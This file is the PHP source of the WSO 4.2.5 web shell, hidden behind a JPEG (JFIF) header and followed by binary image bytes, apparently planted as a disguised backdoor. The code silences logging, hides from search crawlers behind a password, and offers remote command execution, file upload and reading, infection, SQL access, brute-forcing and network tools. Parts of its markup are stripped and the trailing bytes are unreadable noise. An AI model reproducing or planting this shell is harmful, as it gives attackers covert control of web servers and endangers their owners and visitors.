JFIF>=strlen($str))break;}}return base64_decode($enc_str);} @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); if (PHP_VERSION_ID < 70000) @set_magic_quotes_runtime(0); @define('VERSION', '4.2.5'); if(get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } /* (С) 11.2011 oRb */ if(!empty($▛)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛)) prototype(md5($_SERVER['HTTP_HOST']), $▛); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛)) hardLogin(); } if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘; function hardLogin() { if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } die("
Password
"); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; /* (С) 04.2015 Pirat */ function hardHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['▜']; echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."
"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $▟) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['▛'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '[ '.$k.' ]'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if (is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } /* (С) 08.2015 dmkcv */ echo ''. ''. '
Uname:
User:
Php:
Hdd:
Cwd:'.($GLOBALS['os'] == 'win'?'
Drives:':'').'
'.substr(@php_uname(), 0, 120).' [ Google ] [ Exploit-DB ]
'.$uid.' ( '.$user.' ) Group: '.$gid.' ( ' .$group. ' )
'.@phpversion().' Safe mode: '.($GLOBALS['safe_mode']?'ON':'OFF').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
'.viewSize($totalSpace).' Free: '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)
'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.'

Server IP:
'.gethostbyname($_SERVER["HTTP_HOST"]).'
Client IP:
'.$_SERVER['REMOTE_ADDR'].'
'. ''.$menu.'
'; } function hardFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" [ Writeable ]":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

[%RA]sPhOp̰n''lݍػOulMfH [Jl9U ?z#TЙ[/~YK"mXW U'_UЂ{9=8>IJ:=rkL_.BV MW/زN`y;-8Bb{c*rt\rQO^wIf4חy4sJ^G{??4;^_~3ڃkz4k"b5^x(_TδDӖ)K ◑Df]U9ַ;aݦyUbҪP-r}Unx`cQYdrUZq턪ˎFvJ 7|:!=4ǙA.듥zK6ϐzlTC HZ<Nh죡,J%*l%THh 쓾}Q0t\k? ᚹ|%_]W3U`47%~Z!+Lfˡ orZn-DY R mS,Y)hܿto 7. m{Vʩy)MUufc/])-L<KFҮ~H^Wfc8.+ qj'$P)W՛/[UAgsq\\i/ô˃eE1ۍpk06ZY@m]Ċ5v80&p9DkסY~eT,w?>(n%踳-K-#PKz1ٽ[tXfE$>gzpPN)*UZwܴ5w%g*R; Z޽||gIe^W4g*eU#0d;V;Rw;W`WVs-!^k S+^o"\ [a::ji0gTp-@u @u .{s,B5zA=~'-q ~K/fw *[-^&};4Z%+F]<2z~ V=rz-l3] KZח链<^NZG3?+|2|%T\*!qGw;. kKb-Ҁأ@t  DIeݦ2HSu:]IqZ .+hFQO1Z֤Vt+h ~$,U?s>=׺x3Tσ~ V7>L J,FiEL?#|M1Ebu4)(aP7o-WRrc\X%' :B u^D}9{s%(K$pOѬQU\1fx[7J/ N/L?œOkɓkTCYh}Wuiˢ~Lv:i47eu}WȑLC_;eUg'0͐n+v@=^:iIL %US :+ҝv5|:TfTv %Ծ6ܚbJBj~Z[u*`ud⺍+UW`Z ɩ 98'vMq504U-eq2l01Rk x3ix{] ֠Tע:߷Ȯ[>luEђx:%6Vl],.W+ѣg} -}[lQTj>tz͛WSeWG{K I\j!9Ur mle .9͎͗ ) K :q23 ʘ'ķeޭq:WI<ϞOӼer,NTw Grv\SG(QiJEZUـ=Яtvʫ~K